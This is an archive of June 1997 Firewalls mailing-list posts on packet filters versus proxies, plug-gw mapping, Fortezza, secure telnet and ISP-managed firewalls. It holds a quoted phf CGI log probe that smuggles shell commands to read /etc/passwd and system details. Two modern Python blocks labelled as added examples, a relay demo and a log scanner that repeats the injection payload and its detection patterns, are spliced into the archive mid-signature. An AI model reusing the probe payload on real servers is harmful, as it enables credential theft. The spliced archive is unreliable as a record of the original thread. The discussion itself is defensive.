From owner-firewalls-outgoing Wed Jun 4 18:45:54 1997
From: Cy Ardoin
To: Firewalls@GreatCircle.COM
Subject: RE: PIX and FW-1 (packet filter Question)
Date: Wed, 4 Jun 1997 19:45:07 -0400 (EDT)
In-Reply-To: <199706041811.LAA27022@honor.greatcircle.com>

I don't think there is anything an application firewall can do that can't also be done by a "packet filter" firewall. The new packet filter firewalls are not like the old Cisco/Bay router filters. The new systems operate at the network layer, but they have knowledge of the protocols and applications. They open up the packets and modify the data. These systems are doing content filtering and other "application" types of operations. Yes, not all of them do these things, but many do, and new features/functions are being added to these systems every year.

The key trade-off is performance. Network layer filters want to do everything fast. That's required when you are blocking interrupts and other low-level things. So there are some things done by application gateways that these systems are reluctant to do for performance reasons. Nevertheless, the design doesn't prohibit packet filters from performing the functions found in most application gateways. I don't think I would want an application gateway securing a 10Mbit or 100+Mbit pipe to the Internet.

On the other side, packet filters can do things that an application gateway can't do; namely, network-network NAT and bi-directional NAT. Application gateways can't do these things because they must rely on the underlying OS to handle the network layer and deliver the packets to the applications. Now before I get flamed, yes, application gateways can do NAT, but only very simple NAT unless you wedge a process into the kernel to intercept packets before they reach the routing decision. But if you do that, you've just turned your application gateway into a packet filter (and you derive all the "bad" features attributed to packet filters).

--
Cy Ardoin
ardoin@cycon.com
--------------------------------------------------------------------
-- Cypress Consulting, Inc.                | Voice: 703/383-0247  ---
-- 4101 Olympic Way, Alexandria VA         | Fax:   703/383-0320  ----
-- and                                     |                      ----
-- 11240 Waples Mill Road, Suite 403,      | http://www.cycon.com/ ---
-- Fairfax, VA 22030                       |                      --
--------------------------------------------------------------------

From owner-firewalls-outgoing Wed Jun 4 19:11:36 1997
From: "Mark Horn [ Net Ops ]"
To: Anton J Aylward
Cc: Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
Date: Wed, 4 Jun 1997 14:18:21 -0400
Message-ID: <19970604141821.59906@capmark.funb.com>
In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com>; from Anton J Aylward on Wed, Jun 04, 1997 at 11:49:24AM -0400

Anton J Aylward says:
>No, no, no, what *I* want and what about 10^7 other sites want is this...
>
>   client A               W            server C
>                       firewall        server D
>   client B                            server F
>                                       server G
>                                       server H
>                                       server I
>                                       server K
>
>Now that's what *I* call a one to many mapping.
>You come up with a good way to do this and you'll be famous.

Well, as MJR said, it can be done. Get out your kernel hacking tools...

No matter what you do, you can *not* escape the fact that you have to tell plug-gw what the real server is. And unfortunately, with plug-gw the only place that you can store that kind of information is in the headers. So you have to come up with some sort of hack to allow for that specification. On the table there are two solutions:

  o Put the real IP address of the server in the headers and have plug-gw
    intercept it and transparently proxy it.

  o Put an alias IP address in the headers and have plug-gw interpret the
    translation.

If you can come up with some other way to specify the real server in the TCP/IP packet headers from the client, add it to the list. If it's straightforward enough, I'd probably implement it because I have a need for it. Of course, I wouldn't release the patch...
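The second option Mark lists (one alias address per server, with plug-gw working out the translation) is also what Craig Hagan describes earlier in the thread as letting plug-gw find the destination from 'its' own address, and it is the one-to-many mapping Carson answers with NAT. As an added example, not fwtk's plug-gw code, here is a minimal TCP relay in Python that does exactly that: the real server is chosen by the local address the client connected to, looked up in a rule table, and a connection arriving on a firewall address with no mapping is refused and recorded. The rule table, the stand-in servers and the function names are constructed for the example; the offline demo keys the table on distinct loopback ports, where a deployment would key it on the alias IP addresses of the firewall's client-side interface.

```python
import asyncio


def resolve_target(table, sockname):
    """Map the local (ip, port) a connection arrived on to its (server_ip, port).

    In deployment the keys differ by alias IP, e.g. ("10.0.0.11", 80) for
    server C and ("10.0.0.12", 80) for server D (constructed values); the
    offline demo below keys on distinct loopback ports instead.
    """
    return table.get((sockname[0], sockname[1]))


async def pump(reader, writer):
    """Copy one direction until EOF, then half-close so the reply can still finish."""
    try:
        while True:
            data = await reader.read(4096)
            if not data:
                break
            writer.write(data)
            await writer.drain()
    except OSError:
        pass                              # peer went away; the other pump sees EOF
    finally:
        if writer.can_write_eof():
            writer.write_eof()


def make_plug_handler(table, denied):
    """Build the accept handler; 'denied' collects arrivals with no mapping."""
    async def handle(client_reader, client_writer):
        sockname = client_writer.get_extra_info("sockname")
        target = resolve_target(table, sockname)
        if target is None:
            # Default deny: an address nobody mapped relays nothing, and the
            # arrival is recorded so it can be logged as a misconfiguration or probe.
            denied.append(sockname)
            client_writer.close()
            return
        try:
            srv_reader, srv_writer = await asyncio.open_connection(*target)
        except OSError:
            client_writer.close()
            return
        await asyncio.gather(pump(client_reader, srv_writer),
                             pump(srv_reader, client_writer))
        srv_writer.close()
        client_writer.close()
    return handle


async def start_fake_server(name):
    """Stand-in for an internal web server: answers with its name plus the request."""
    async def handle(reader, writer):
        data = await reader.read(4096)
        writer.write(name.encode() + b": " + data)
        await writer.drain()
        writer.close()
    return await asyncio.start_server(handle, "127.0.0.1", 0)


async def query(port, payload):
    """Client side: connect to one firewall-side address, send a request, read the reply."""
    reader, writer = await asyncio.open_connection("127.0.0.1", port)
    try:
        writer.write(payload)
        await writer.drain()
        writer.write_eof()
        return await reader.read()
    except (ConnectionResetError, BrokenPipeError):
        return b""                        # refused by the plug: nothing relayed
    finally:
        writer.close()


async def demo():
    servers = {name: await start_fake_server(name) for name in ("server C", "server D")}
    table, denied, aliases = {}, [], {}
    handler = make_plug_handler(table, denied)
    for name, srv in servers.items():
        alias = await asyncio.start_server(handler, "127.0.0.1", 0)
        aliases[name] = alias
        real_port = srv.sockets[0].getsockname()[1]
        table[alias.sockets[0].getsockname()[:2]] = ("127.0.0.1", real_port)
    # One more firewall-side address that is deliberately left out of the table.
    unmapped = await asyncio.start_server(handler, "127.0.0.1", 0)
    port_of = lambda s: s.sockets[0].getsockname()[1]
    request = b"GET / HTTP/1.0\r\n\r\n"
    results = {
        "C": await query(port_of(aliases["server C"]), request),
        "D": await query(port_of(aliases["server D"]), request),
        "unmapped": await query(port_of(unmapped), request),
        "denied": len(denied),
    }
    for s in list(servers.values()) + list(aliases.values()) + [unmapped]:
        s.close()
    return results


def run_demo():
    return asyncio.run(demo())


if __name__ == "__main__":
    print(run_demo())
```

run_demo() brings up two stand-in servers and three firewall-side listeners, sends one request through each, and returns the replies: the first two come back from server C and server D respectively, and the third listener, having no mapping, relays nothing and leaves one entry in the denied list. The default-deny path is the part worth keeping in any real plug: a connection to a firewall address nobody mapped is either a misconfiguration or a probe, and in both cases it should be logged rather than plugged anywhere.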
Cheers,
--
Mark Horn
PGP Public Key available from: http://www.es.net/hypertext/pgp.html
PGP KeyID/fingerprint: 00CBA571/32 4E 4E 48 EA C6 74 2E 25 8A 76 E6 04 A1 7F C1

From owner-firewalls-outgoing Wed Jun 4 19:12:57 1997
From: Vin McLellan
To: firewalls@greatcircle.com
Subject: Fortezza's Fate??
Date: Wed, 4 Jun 1997 14:12:24 -0500

Anyone out there watching Fortezza's doom unfold?

Fortezza was the US DoD's crypto (PCMCIA only?) smartcard, part of the Capstone family introduced back with the original Clipper proposal for non-classified DoD use and other US government applications -- and, for a while, heavily promoted to the civilian US government agencies, as well as to industry. Fortezza has Skipjack symmetric crypto (160 bit keys, I think) as well as full public-key functionality, but it was designed to complement the Clipper policy, so I recall it tossed off a LEAF escrow copy of each session key to government-established secure "key warehouses" in DoD, Commerce, and Treasury, maybe among other agencies.

I presume many of the prominent firewall vendors got involved, since for a time it looked like this was going to be the authentication device used by the US DoD, other federal government employees, and contractors accessing federal systems. Fortezza is -- was? -- also obviously a big deal for network and firewall administrators (and users) at many US government agencies.

There are a lot of rumors buzzing around DC these days to the effect that NSA and the Joint Chiefs have tossed in the towel and will, within weeks, approve DoD purchases for non-Fortezza security systems, for both strong authentication, and (I presume) more standard PKI. I understand they have been briefing US.gov security staff and the contractors who have been working on Fortezza apps. I also understand that DoD is considering approving Fortezza in software applications?!?

I'm seeking some perspective on what happened and why. I'm intrigued, but ill informed. (Please feel free to correct anything above.)

Suerte,
_Vin

Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA
<617> 884-5548 -- <@><@> --

From owner-firewalls-outgoing Wed Jun 4 19:16:03 1997
From: tsanghan@contact.com.sg (Wong Tsang Han)
To: Jose Luis Delgado
cc: firewalls@GreatCircle.Com
Subject: Re: Secure Telnet!
Date: Thu, 5 Jun 1997 09:50:38 +0800 (SGT)

You can try http://www.datafellows.com/

On Wed, 4 Jun 1997, Jose Luis Delgado wrote:

> > Ssh (Secure Shell) is a program to log into another computer over a
> > network, to execute commands in a remote machine, and to move files from
> > one machine to another. It provides strong authentication and secure
> > communications over insecure channels.
>
> Hi to everyone!
>
> Does anybody know, where can I find shareware/freeware SECURE telnet for
> NT???
>
> Thanks in advance!
>

From owner-firewalls-outgoing Wed Jun 4 20:09:49 1997
From: "Walczak, Joe"
To: "'firewalls@greatcircle.com'"
Subject: RE: ISP Connection
Date: Wed, 4 Jun 1997 14:39:43 -0400

My only comment here is that I would not let ANYONE else manage/operate my firewall, ISP or not!!! Secondly, I would not tell anyone which firewall I am using. The ISP does not need to know that information.

Joe Walczak
joe.walczak@transquest.com

>----------
>From: Mariko Yashada[SMTP:mariko@grfn.org]
>Sent: Wednesday, June 04, 1997 3:01 PM
>To: Firewalls Mailing List
>Subject: Re: ISP Connection
>
>Thank you for all your comments. Last fall our plan was to connect to the
>Internet through MCI. We security people said fine, but you will need a
>firewall for any connections between the Internet and the Enterprise
>Network. So we did an evaluation of firewalls and settled on two we felt
>best suited our needs. The firewall added enough cost to the project that
>it was postponed. It has now been revived using our ISP for the connection
>with the hope the ISP can some way offer the security. I see now we should
>follow our original plan and put up a firewall at our end.
>
>Here is a related question:
>
>There is another local ISP who will connect us at T1 and install a firewall
>at our location. They will then administer the firewall remotely from their
>location. They support three different firewalls, Gauntlet, Firewall-1 and
>Borderware. The advantage is the savings in admin costs. Has anyone had any
>experience with this type of arrangement? We have also talked to BBN about
>their Site Patrol product, which is a remotely managed Gauntlet.
> >Thanks, > >Mariko > From owner-firewalls-outgoing Wed Jun 4 20:16:29 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA01241 for firewalls-outgoing; Wed, 4 Jun 1997 19:38:28 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA01227 for ; Wed, 4 Jun 1997 19:38:21 -0700 (PDT) Received: from smtp.usit.net (smtp.usit.net [199.1.48.16]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id TAA01291 for ; Wed, 4 Jun 1997 19:44:28 -0700 (PDT) Received: from gammag_r.ins.com (nash-max47.dynamic.usit.net [205.241.193.175]) by smtp.usit.net (8.8.5/8.8.5) with SMTP id WAA06144; Wed, 4 Jun 1997 22:42:05 -0400 (EDT) Message-Id: <3.0.32.19970604214203.006978f4@pop.usit.net> X-Sender: rlgammag@pop.usit.net X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 04 Jun 1997 21:42:06 -0500 To: uskanbye@ibmmail.com, firewalls@GreatCircle.COM From: Robert Gammage Subject: Re: Eagle Raptor NT 4.0 and "Local Tunnel" Config Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have done this for nonGSPable (nice nonword huh) protocols. Check out http://www.raptor.com/cs/FAQ/entv4localtunnel.htm for a nicely detailed FAQ. The only gotchas I recall: (1) I felt it odd that the application proxys and GW-Control come up come up completely, and then (later) the tunnels are fired up even though they operate at a lower level (interface-filters, tunnels, then GW-Control in that order). (2) If you define Universe (0.0.0.0/0) as one of the Secure Subnets, it has to be on the "A" end of the tunnel (this is a bug) or GW Control will complain about an illegal network in the log during startup. (3) A tunnel with no filters applied moves everything that meets the address (Source or Destination secure-subnet) criteria. 
Once you apply a filter (or group of filters) you have then limited the traffic allowed to pass through the tunnel.

Otherwise, they are pretty straight-forward and fairly insecure.

At 05:13 PM 6/4/97 EDT, uskanbye@ibmmail.com wrote:
>
>Anybody out there using the local (null) tunnel feature in the Eagle NT 4.0
>firewall? We're attempting to configure this, in conjunction with filters,
>to pass some protocols that can't be GSP'd (Data Link Switching/DLSw).
>
>Any advice/comments/suggestions welcomed. Thanks!
>
>
> --------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT---------
> ---------------WWW.STATE.KS.US/PUBLIC/KDHE----------------
> --------------Landon State Office Building----------------
> ------------------Phone (913) 296-5643--------------------
>
>

Robert (Bob) Gammage                  BAROQUE (adj):
Network Systems Engineer              When you are
International Network Services        out of Monet.
615-783-1652  Pager 800 INS-1-INS


From owner-firewalls-outgoing Wed Jun 4 20:24:51 1997
Date: Wed, 4 Jun 1997 14:04:23 -0400 (EDT)
From: "Gary G. Hull"
To: Stan Wnuck
Cc: Firewalls@GreatCircle.COM
Subject: Re: getting passwd file via WWW
In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com>

Stan --

Someone from some.remote.location.edu is attempting to capture your /etc/passwd file (password file). It appears that they may have succeeded. I'd suggest you take your server down (off the internet) until you are able to ensure you have not been compromised. To be safe, you will want to change all of your passwords. Also, remove the cgi-bin scripts if you don't need them, or at least change the permissions on them so that only the script owners have rwx to them.

On Wed, 4 Jun 1997, Stan Wnuck wrote:

> Hi all,
>
> I have noticed on my WWW log files the following 2 entries.
>
> some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
> some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
>
> Does anyone know anything about these cgi scripts or programs?
> Or how dangerous this is?
>
> I changed the real source location to a fake some.remote.location.edu to
> not let out the bag of the source of this hack, since I am not sure what
> my next move would be.
>
> Thanks in advance.
>
> Stan Wnuck                              swnuck@unixpros.com
> Unixpros, Inc.
> 10 Industrial Way East                  (908) 389-3295 x542
> Eatontown, NJ 07724                     (908) 389-5461 Fax
>
> PM-CHS Technology Insertion Office
> Ft. Monmouth Army Base, NJ              (908) 427-2033 / 427-6963
>

|/ ---o0o-@@-o0o---------
Gary G. Hull - Technical Consultant
Howard Systems International - Glaxo Wellcome Inc.
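The two log entries Stan quotes are the classic phf probe: a percent-encoded newline (%0A) ends the intended Jserver value and everything after it was meant to reach a shell, while the second entry tries php.cgi for the same file. Added example, not part of the thread: a small scanner that parses Common Log Format lines, flags requests to those scripts or carrying an encoded newline, decodes what was injected, and reports the HTTP status so a responder can tell a served request (200) from a missing script (404); the sample log lines are constructed after the ones in the post.

```python
"""Scan web-server access logs for phf-style CGI probes (added example)."""
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status bytes.
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# CGI scripts the thread shows being probed; extend from your own CGI inventory.
SUSPECT_SCRIPTS = ("/cgi-bin/phf", "/cgi-bin/php.cgi")

# Once decoded, these mean the query was aimed at a shell or the file system
# rather than at the script's form fields.
SHELL_META_RE = re.compile(r"[\n\r;|`]|/etc/passwd")

# Constructed sample log, modelled on the two entries quoted in the thread
# plus one ordinary request; the host name is the poster's own placeholder.
SAMPLE_LOG = [
    'some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] '
    '"GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd'
    '%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qslip= HTTP/1.0" 200 140',
    'some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] '
    '"GET /cgi-bin/php.cgi?/etc/passwd" 404 143',
    '192.0.2.7 - - [28/Apr/1997:02:00:00 +0000] "GET /index.html HTTP/1.0" 200 2048',
]


def injected_commands(query):
    """Return the shell lines smuggled into a query string.

    phf handed each form value to a shell, so an encoded newline inside a
    value ended the intended argument and the lines after it ran as separate
    commands.  For each parameter, every decoded line after the first is
    therefore text the attacker wanted executed.
    """
    commands = []
    for param in query.split("&"):
        _, _, value = param.partition("=")
        lines = unquote(value).split("\n")
        commands.extend(c.strip() for c in lines[1:] if c.strip())
    return commands


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    m = CLF_RE.match(line)
    if not m:
        return None                      # not CLF; leave unparsable lines alone
    target = m.group("target")
    path, _, query = target.partition("?")
    decoded = unquote(target)
    reasons = []
    if path in SUSPECT_SCRIPTS:
        reasons.append("known-abused cgi script")
    if "%0a" in target.lower() or "%0d" in target.lower():
        reasons.append("encoded newline in query")
    if SHELL_META_RE.search(decoded):
        reasons.append("shell metacharacter or sensitive path after decoding")
    if not reasons:
        return None
    status = int(m.group("status"))
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "path": path,
        "status": status,
        # 200 means the server answered the request; 404 means the script was
        # not there, which is why the advice above hinges on the first entry.
        "served": status == 200,
        "reasons": reasons,
        "injected_commands": injected_commands(query),
    }


def scan(lines):
    """Analyse every log line and return the findings in order."""
    return [f for f in (analyse_line(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["host"], finding["path"], finding["status"],
              "served" if finding["served"] else "not served")
        for cmd in finding["injected_commands"]:
            print("   injected:", cmd)
```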
Five Moore Drive - Raleigh, North Carolina 27709
Tel : (919) 941-4867 - Fax : (919) 483-0056
email: ggh14854@ussun2f.glaxo.com


From owner-firewalls-outgoing Wed Jun 4 20:30:23 1997
Message-Id: <3.0.1.32.19970604232411.00969400@netevolve.com>
Date: Wed, 04 Jun 1997 23:24:11 -0400
From: Irwin Lazar
To: Mike Hedlund, zzIML Firewalls
Cc: "'Firewalls@GreatCircle.COM'"
Subject: Re: Do people host WWW servers behind firewalls?
References: <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com>

At 05:35 PM 6/4/97 -0700, Mike Hedlund wrote:
>
>On Wed, 4 Jun 1997, zzIML Firewalls wrote:
>
>> This has been an ongoing planning debate for us... does the potential
>> latency and overhead of a firewall potentially point toward putting
>> high-access high-performance WWW servers on the net without a firewall?
>> Is there a true trade-off of "security vs. performance"?
>>
>
>A firewall doesn't necessarily mean you're secure. Carefully securing your
>machine(s) at a host level is a good way to start. It's amazing how many
>large sites out there don't do basic audits of their own sites. IE;
>disabling all nonessential services, etc. The more possible entry points
>you eliminate for an intruder, the harder it will be for them to get in.
>And by making it more difficult to get in, hopefully they have to do
>something which you will notice.
>
>> Presume that the WWW servers are at a co-location ISP site and don't
>> have any "critical data" on them. They are mostly publish sites...
>>
>
>I think for most organizations, who put money into developing a site on
>the net, be it web/ftp/chat whatever, have a vested interest in keeping it
>secure. Not because they are worried about people seeing data they
>shouldn't see, but because of the publicity you will get after being
>hacked.. i could see it now.. some CEO of a big company turns on CNN to
>hear a story about how a 12 year-old kid hacked his company's website
>from school and put up a banner saying 'Im g0d'. It doesn't matter if the
>kid got anything important.
>

That is a very good point. For those who run web servers on Solaris boxes, there is a very good FAQ on how to secure it at http://www.sun.com/sunworldonline/common/security-faq.html. There are quite a few services that can be turned off, and quite a few extras that aren't needed.


From owner-firewalls-outgoing Wed Jun 4 20:45:42 1997
Date: Wed, 4 Jun 1997 23:34:01 -0500
From: Vin McLellan
To: Jose Luis Delgado
Cc: firewalls@greatcircle.com
Subject: Re: Secure Telnet!
References: <33956E4A.6590018C@pvt.net>

Jose Luis Delgado asked:

>Does anybody know, where can I find shareware/freeware SECURE telnet for
>NT???

As you probably know, F-Secure (commercial SSH from Datafellows) has NT clients and servers for SSH. But, unfortunately, it is neither free nor freeware.

I haven't seen nor heard much about STEL (Secure Telnet) in the past year (not a great sign;-) but you might check out the current STEL package at the Italian CERT, based at U of Milan, to see if their Secure Telnet (STEL) has been extended to NT:

ftp://idea.sec.dsi.unimi.it/pub/security/cert-it/

If that doesn't pan out, do a search at COAST, the huge archive at Purdue University, always worth the visit:

http://www.cs.purdue.edu/coast/

You might also toss a query to the growing cult of those obsessed with improving NT security: the subscribers of ISS's NT-Security List.. There is probably an NT-Security archive at the ISS web site.

Another possible resource, check Russ Cooper's NT-Bugtraq archives at:

http://ntbugtraq.rc.on.ca/archives/ntbugtraq.html

I, for one, would appreciate it if you would report back to this List if you find something free/cheap and useful.

Suerte,
_Vin

Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA
<617> 884-5548 -- <@><@> --


From owner-firewalls-outgoing Wed Jun 4 20:58:31 1997
Message-ID: <0C673F68C3A0D011A94208002BE526253535@usbgrexch01.us.landisstaefa.com>
From: "Kohn, Joav"
To: "'Mariko Yashada'"
Cc: Firewalls Mailing List
Subject: RE: ISP Connection
Date: Wed, 4 Jun 1997 13:17:36 -0500

mariko:

how you manage the firewall is a delicate balance. having an outside vendor take care of management simplifies things greatly for your organization, gives you an expert on the product, but also means that your needs and concerns regarding the firewall are weighed against their other clients.

it really boils down to a matter of trust. outside management of your firewall means trusting an outside company with access to your corporate network. you have to do a gut check to see how you feel about that, as well as with some guys in legal.

the main issue with security is not simply getting the f/w to work, but most importantly being able to monitor the activity and have it reflect your corporate security policies. if an outside firm isn't going to keep on top of the box, you really don't know how secure you are. alternatively, the same is true if you don't know what to monitor for.

from personal experience, we had a similar setup here initially, with an outside vendor administering our firewall, but on-site & by phone only. it soon became clear that to get the product to work the way we wanted to and to get the security we felt we needed, we had to bring the staff in here to do it. (otherwise i wouldn't be typing this message).

-joav kohn
sr. technical consultant
it/workgroup communications
landis & staefa

> -----Original Message-----
> From: Mariko Yashada [SMTP:mariko@grfn.org]
> Sent: Wednesday, June 04, 1997 2:01 PM
> To: Firewalls Mailing List
> Subject: Re: ISP Connection
>
> There is another local ISP who will connect us at T1 and install a
> firewall at our location. They will then administer the firewall remotely
> from their location. They support three different firewalls, Gauntlet,
> Firewall-1 and Borderware. The advantage is the savings in admin costs.
> Has anyone had any experience with this type of arrangement? We have also
> talked to BBN about their Site Patrol product, which is a remotely managed
> Gauntlet.
From owner-firewalls-outgoing Wed Jun 4 20:59:21 1997
Date: Wed, 04 Jun 1997 14:15:23 -0700
From: Bill Stout
To: firewalls@greatcircle.com
Subject: RE: PIX and Firewall-1
Message-Id: <2.2.32.19970604211523.0070ff68@vaxf.pios.com>

Peter Carlson writes....

>in what way are application level gateways more secure than, say, FW-1 or PIX?
>There are certainly capabilities that can be provided via application
>proxies that can't be provided by any filter-based technologies, but what
>types of attacks are a FW-1 or a PIX vulnerable to that application
>proxies aren't?

Do not replace a proxy server with a 'State-based Firewall'.

State-based or packet filter firewalls are being marketed well. Engineers who work for these companies know better than to replace proxies with filters, but they're not stupid enough to kill potential sales. ;)

Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the firewall. (From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional authentication. If that packet passes all filtering rules, remaining packets of that session are passed through without inspection.

A properly configured (Internet) firewall comprises a proxy server protected from the Internet by a packet filter. The better the packet filter (state-based or extended filter), the less work the proxy server has to do as far as inspecting/denying traffic. The packet filter can also protect the proxy server from misc. IP-based attacks.

Good applications for packet filter/State-based firewalls are low-security internet feeds and fast low-latency intranet (10/100/155MB/...) security filtering. Not everyone needs a full application proxy firewall, a subject that comes up when I visit Mom-and-Pop small businesses that want a single feed for their 10 PCs.

IMHO - State-based firewalls are 'only' packet filters, and for the corporate environment should not replace the traditional proxy server, but work in conjunction with one.

_____________________________________________________________________________
Bill Stout (Systems Engineer/Consultant)              stoutb@pios.com
Pioneer Standard (Computer Systems & Components)       http://www.pios.com/
San Jose, CA (Location of 1 of 52 U.S. offices)       (408) 954-9100
*My opinions do not reflect that of the company, and vice versa, thankfully.*


From owner-firewalls-outgoing Wed Jun 4 22:30:37 1997
Date: Thu, 5 Jun 1997 14:45:09 +0930 (CST)
From: David Murray
To: firewalls@GreatCircle.COM
Subject: SMTP-MSmail

Hi,

This is a little off topic, so I apologise. However, does anyone know of a commercial product that has the functionality for translating MSMail to SMTP, and if possible runs on a Unix box.

TIA

Dave.

_______________________________________________________________________________
David Murray,                          Phone: +61 8 8303 3300
Systems Engineer,                      Fax:   +61 8 8303 4403
Camtech Group Pty. Ltd.                Email: dmurray@camtech.com.au
PO Box 128,                            8th Floor,
Rundle Mall, Adelaide SA 5000,         10 Pulteney Street,
South Australia,                       Adelaide, South Australia,
Australia.                             Australia. 5000
______________________________________________________________________________


From owner-firewalls-outgoing Wed Jun 4 22:45:30 1997
Message-Id: <3.0.1.32.19970604232259.009d55c0@woody.wcnet.org>
Date: Wed, 04 Jun 1997 23:22:59 -0400
From: "Jeremy D. Zawodny"
To: Wong, Daniel_Yamaguchi@iscci.com, Jan Guldentops, "Jeremy D. Zawodny"
Cc: firewalls@GreatCircle.COM
Subject: Re: Microsoft Proxy Server
In-Reply-To: <33956691.57F6@pdx.com.my>
References: <882564A1.00018A6A.00@isc_domino.iscci.com>

At 08:58 PM 6/4/97 +0800, Wong wrote:
>On 23 May 1997, Daniel_Yamaguchi@iscci.com wrote:
>>
>> All About MickySoft Proxy Server
>>
>> Security (...???)
>>
>> Microsoft's Proxy Server was subjected to extensive security testing and
>> evaluation from independent testing agency, Coopers & Lybrand's Information
>> Technology Security Services and is resistant to common attacks such as "IP
>> Spoofing", 'SATAN", and "ISS."
>>
>C & L is an accounting and consulting firm (correct me if I'm wrong).
>What do they know about TCP/IP ports, filters (packet-level,
>application-level), encryption etc ?
>They might talk about this and that, but do they know how to configure a
>proxy server or a firewall ?

Quite a lot, I'd imagine--that is, if they're anything like their peers: Andersen Consulting, Ernst & Young, etc... Much of their business now comes from consulting on topics like network security, architectures, and so on. You'd be surprised, I think.

How do I know? I almost went to work for Ernst & Young Consulting and met some of their best people. They *do* know their stuff.

>> Manageability & Ease of Use
>>
>> Integrated with NT User Directory Services, Microsoft Proxy Server allows:
>>
>Directory Service? Are you sure? Using NOVELL NDS or BANYAN Streetalk ?
>Or LDAP?

As the message said, MS Proxy uses NT's directory services (as in their domain security model) to perform authorization and authentication.

>> Easy Administration provided by a clean, easy to understand and easy to
>> administer interface.
>>
>How do you administer multiple servers? And they are spread nation-wide?
>Unless you are running NetWare 4.x or Banyan.

If they're all part of the same master domain, you administer them the same way you'd administer any other NT services running on many NT boxes on a WAN. This is really a non sequitur.

>> Remote Administration via Internet Service Manager allows Microsoft Proxy
>> Server to be managed from any Windows NT system on the network.
>>
>I thought only NetWare have a utility called "rconsole" ?

What's your point?

>> Web Proxy
>>
>> Multi-Platform Support - The Web Proxy Server supports all platforms
>> including:
>> Windows NT Server
>> Windows NT Workstation
>> Windows '95
>> Windows for Workgroups/Win 3.1
>> UNIX
>> Macintosh
>Does IE run on Macintosh or UNIX? NETSCAPE Navigator can.

IE runs on the Mac, but not on Unix. What's that have to do with anything? It's a proxy server--any up-to-date browser can talk to it.

>> Integrates with NT network security domain model - Microsoft Proxy Server
>> extensively leverages the network-based Windows NT domain security model to
>> manage access permission and logging.
>>
>You must use "Trust" to connect those domains together. And, the "Trust"
>can be compromised to make the NT trust anybody. Sounds scary . . . .!

Assuming you have multiple domains, yes. If you run in a Master Domain model (as many companies do), then the trust is there anyway. Again, this is a non sequitur. The features you are picking at are NT features and have little to do with their proxy server, let alone firewalls (which is what this list is about).

>> Massive Scalability - Microsoft Proxy Server's cache is limited only by
>> Windows NT Server system resources.
>>
>Can NT scale up to 64 processors, like the SUN servers? Or 12
>processors, like the Alpha servers.

No.

>Well guys, this is normal MickySoft marketing hype.

And you're surprised?

>On 24 May 1997, Jan wrote:
>>Let's put the record straight: if you are running MS-machines you'll need a
>>complete firewall to shield it all off. Or you can believe all the
>>marketing hype and leave your network completely open....
>
>I agree with what you said.
>
>>At 01:39 AM 5/24/97 -0400, Todd Graham Lewis wrote:
>>>On Fri, 23 May 1997 Daniel_Yamaguchi@iscci.com wrote:
>>>
>>>> We, at ISC Computers & Communications, Inc. feel that this solution will
>>>> meet your current needs regarding Internet Security.
>>>
>>>I, at 1025 Greenwood Avenue Apartment 3 in Atlanta, do not.
>
>>Great... *Why not?*
>
>You can scroll-up to know why, Jeremy.

I did, and what I saw was an obviously biased view against Microsoft. Your apparent dislike of NT has made it difficult for you to put their product in perspective--to figure out where it *makes sense* and does not.

Jeremy
---
Jeremy D. Zawodny
WCNet Technical Geek & Web Stuff
"You are what you think."
